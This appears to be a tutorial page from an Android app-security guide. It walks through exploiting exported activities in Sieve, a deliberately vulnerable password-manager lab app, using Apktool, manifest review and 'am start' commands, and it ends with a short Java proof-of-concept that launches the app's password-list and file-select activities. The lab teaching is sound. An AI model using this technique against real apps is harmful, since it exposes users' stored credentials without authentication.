> For the complete documentation index, see [llms.txt](https://sec88.0x88.online/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sec88.0x88.online/android-appsec/exported-activity-hacking.md).

# Exported Activity Hacking

1. **Retrieve the APK File**: Obtain the target APK file that you want to analyze.

<figure><img src="/files/TGfkF5U2CBJlv2WgEVJm" alt=""><figcaption></figcaption></figure>

1. **Install APK on the Android Emulator**

   <figure><img src="/files/0L0CW3cUcWvSLYSDZyvq" alt=""><figcaption></figcaption></figure>
2. **Decompile APK using Apktool**

   <figure><img src="/files/EDO5MClqI55fWRynwfun" alt=""><figcaption></figcaption></figure>
3. **Decode APK Contents**

   <figure><img src="/files/f7I2jkwd46R2wWzKWHes" alt=""><figcaption></figcaption></figure>
4. **Analyze** `AndroidManifest.xml`: Investigate the `AndroidManifest.xml` file to identify declared activities and their associated permissions, Notice that there is exported Activities.

   <figure><img src="/files/h8GpL2trbsXGOR8UOOyC" alt=""><figcaption></figcaption></figure>
5. **Exploration of Application Features**: Launch the application on the emulator to interact with its functionalities, Notice it is simple password manageer.

   <figure><img src="/files/mFmUib0Z20JXHfDUBY9P" alt=""><figcaption></figcaption></figure>
6. **Identify Authentication Requirements**: Note any authentication mechanisms required by the application, such as password length or two-factor authentication (2FA) PIN.

   <figure><img src="/files/Ea9yznleqtP4qXaBbMeC" alt=""><figcaption></figcaption></figure>
7. **Access Password List Activity**: Discover the Password List Activity mentioned in the `AndroidManifest` file, where passwords and account details are managed

   <figure><img src="/files/b6qvC5AofB5I25vSLt9v" alt=""><figcaption></figcaption></figure>
8. **Attempt to Access Exported Activities**: Use the Activity Manager (am start -n ) to try accessing exported activities from outside the application

   <figure><img src="/files/RJ2V4Tw9Rt9kDPC7asnO" alt=""><figcaption></figcaption></figure>
9. **Investigate Potential Data Storage Locations**: Start file list activity and searching for any data leakage, but found nothing + i couldn't access other activities from there.
10. **Access Password List Activity**: Successfully access the Password List Activity from outside the application

    <figure><img src="/files/6XMzWfF7gXojNLRZ2y2R" alt=""><figcaption></figcaption></figure>
11. **Encounter Error Messages**: Encounter error messages when attempting to view or modify passwords due to a required service not being started.

    <figure><img src="/files/hmUqsnyrjmCkYxddu4Hg" alt=""><figcaption></figcaption></figure>
12. **Examine Settings and Backup Options**: Investigate settings options within the application to create backups of passwords
13. **Discover Backup File Accessibility**: Find that backup files can be accessed via another exported activity, `com.mwr.example.sieve/.FileSelectActivity`
14. **Identify Security Vulnerability**: Realize that plaintext passwords are accessible without authentication, potentially exposing users to password theft through malicious apps.

    <figure><img src="/files/MsgtaSIdAs6LHY9ZkTDe" alt=""><figcaption></figcaption></figure>
15. Example code for Exploit POC

```java
import android.content.Intent;
import android.os.Bundle;
import android.support.v7.app.AppCompatActivity;
import android.view.View;
import android.widget.Button;

public class MainActivity extends AppCompatActivity {

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);

        // Button to start FileSelectActivity
        Button fileSelectButton = findViewById(R.id.file_select_button);
        fileSelectButton.setOnClickListener(new View.OnClickListener() {
            @Override
            public void onClick(View v) {
                // Create an Intent to start the FileSelectActivity
                Intent intent = new Intent();
                intent.setClassName("com.mwr.example.sieve", "com.mwr.example.sieve.FileSelectActivity");
                startActivity(intent);
            }
        });

        // Button to start PWList Activity
        Button pwListButton = findViewById(R.id.pw_list_button);
        pwListButton.setOnClickListener(new View.OnClickListener() {
            @Override
            public void onClick(View v) {
                // Create an Intent to start the PWList Activity
                Intent intent = new Intent();
                intent.setClassName("com.mwr.example.sieve", "com.mwr.example.sieve.PWList");
                startActivity(intent);
            }
        });
    }
}
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://sec88.0x88.online/android-appsec/exported-activity-hacking.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.